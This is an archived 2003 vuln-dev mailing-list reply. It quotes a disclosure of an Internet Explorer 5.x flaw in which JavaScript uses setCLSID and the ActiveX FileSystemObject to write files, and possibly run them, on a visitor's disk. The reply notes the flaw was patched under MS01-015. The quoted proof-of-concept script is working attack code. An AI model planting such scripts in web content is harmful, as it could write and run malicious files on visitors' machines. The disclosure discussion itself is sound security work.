RE: Internet Explorer JavaScript insecure function

From: Scovetta, Michael V (Michael.Scovetta_at_ca.com)
Date: 12/08/03

  • Next message: Valdis.Kletnieks_at_vt.edu: "Re: locating default signal handler for SIGSEGV" 
    Date: Mon, 8 Dec 2003 13:58:54 -0500
To: "FREEBRAIN" <freebrain@unionnewbies.net>, <vuln-dev@securityfocus.com>

    This is an old exploit, google "setCLSID" and you'll see a bunch of docs
    referencing this exploit. From what I gather, it's the result of some
    combination of a buggy WshShell, jscript.dll, and bad Internet-Zone
    security values. I believe Microsoft fixed this more than two years ago,
    as per:
       http://www.microsoft.com/technet/security/bulletin/MS01-015.asp
    (and probably others). If you're still using IE 5.x, you should just
    upgrade. I'm sure that there are many users still using 5.x browsers, but
    if you have it totally patched, this should not be exploitable.

    And WriteLine is an function of the ActiveX FileSystemObject, which has
    nothing to do with JavaScript-- JS only provides the ability to call
    ActiveX functions.

    I was unable to get this exploit to work, regardless of my security settings,
    using 6.0.2800.1106.

    Michael Scovetta

    -----Original Message-----
    From: FREEBRAIN [mailto:freebrain@unionnewbies.net]
    Sent: Sunday, December 07, 2003 9:57 AM
    To: vuln-dev@securityfocus.com
    Subject: Internet Explorer JavaScript insecure function

    * Internet Explorer JavaScript insecure function *

    Product: Microsoft Internet Explorer
    Version: 5.x (probabily other versions may be affected)

    ***

    Problem:

    I discovered a javascript function (interpreted by Internet Explorer) called
    "file.writeline()" may be
    potentially dangerous for Internet Explorer users. This function allows to
    write files by means of
    JavaScript on a hard disk.

    An attacker may use this function writting JavaScript code in posts of
    forums, guestbooks, etc for owning
    his victim's computers. With "file.writeline()" function the attacker can
    write trojans/virus/etc on his
    victim's hard disks, for example, an attacker may use JavaScript
    "file.writeline()" function for writting
    a malicious file in VBS (Visual Basic Scripting) language.

    I repeat, this may be potentially dangerous for Internet Explorer users.

    NOTE: Actually a virus in the wild that affects to mIRC users is using this
    function ("file.writeline").

    NOTE2: As you can see on the "Proof of concept", other functions are needed
    to carry out an "intrusion".

    ***

    Proof of concept:

    InterfaceObject=document.applets[0];
    setTimeout("Write()",1000);
    function Write() {
    fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}";
    InterfaceObject.setCLSID(fsoClassID);
    fso = InterfaceObject.createInstance();
    // windir = fso.getspecialfolder ;
    filename = "\\proof.txt";
    var filecontent = "Hello world";
    file = fso.opentextfile(filename, "2", "TRUE");
    file.writeline(filecontent)
    file.close();

    }

    This code writes a file called "proof.txt" in the hard disk, with the
    content "Hello world". Also you can
    execute files you write by means of JavaScript adding "Run();" to the
    function.

    ***

    Solution:

    I'm not sure about the solution but I recommend to upgrade to the last
    version of Internet Explorer.
    Also I recommend webmasters to forbid HTML codes that content this function
    in their forums, guestbooks, etc.

    ***

    Thanks to:

    #disidents,#hackers,#hacker @ irc-phoenix.org

    #disidents,#sleepx,#ayuda_internet @ irc-hispano.org

    Special thanks go to: Impos, |_Tr0mP4s

    (sorry my poor english)

    ***

    By FREEBRAIN

    FREEBRAIN is a member of DisidentS Hacker Team

    http://disidents-team.cjb.net (under construction) -
    http://www.gratisweb.com/disidents

    <freebrain@unionnewbies.net> ( www.unionnewbies.net )

  • Next message: Valdis.Kletnieks_at_vt.edu: "Re: locating default signal handler for SIGSEGV"

    Relevant Pages

    • Re: Internet Explorer JavaScript insecure function
      ... could u please post an html? ... F> I discovered a javascript function called ... F> potentially dangerous for Internet Explorer users. ... With "file.writeline" function the attacker can ...
      (Vuln-Dev)
    • Internet Explorer JavaScript insecure function
      ... Product: Microsoft Internet Explorer ... I discovered a javascript function called ... With "file.writeline" function the attacker can ... This code writes a file called "proof.txt" in the hard disk, ...
      (Vuln-Dev)
    • [Full-Disclosure] Internet Explorer JavaScript insecure function
      ... Product: Microsoft Internet Explorer ... I discovered a javascript function called "file.writeline" may be ... An attacker may use this function writting JavaScript code in posts of forums, guestbooks, etc for owning ... this may be potentially dangerous for Internet Explorer users. ...
      (Full-Disclosure)
    • Re: Microsoft Security Bulletin MS03-040 - 828750
      ... cross-posts fake Microsoft Security bulletins [which, by the way, ALSO have ... Cumulative Patch for Internet Explorer ... A vulnerability that occurs because Internet Explorer does not ... It could be possible for an attacker who exploited this ...
      (microsoft.public.security)
    • Re: Microsoft Security Bulletin MS03-040 - 828750
      ... cross-posts fake Microsoft Security bulletins [which, by the way, ALSO have ... Cumulative Patch for Internet Explorer ... A vulnerability that occurs because Internet Explorer does not ... It could be possible for an attacker who exploited this ...
      (microsoft.public.security.virus)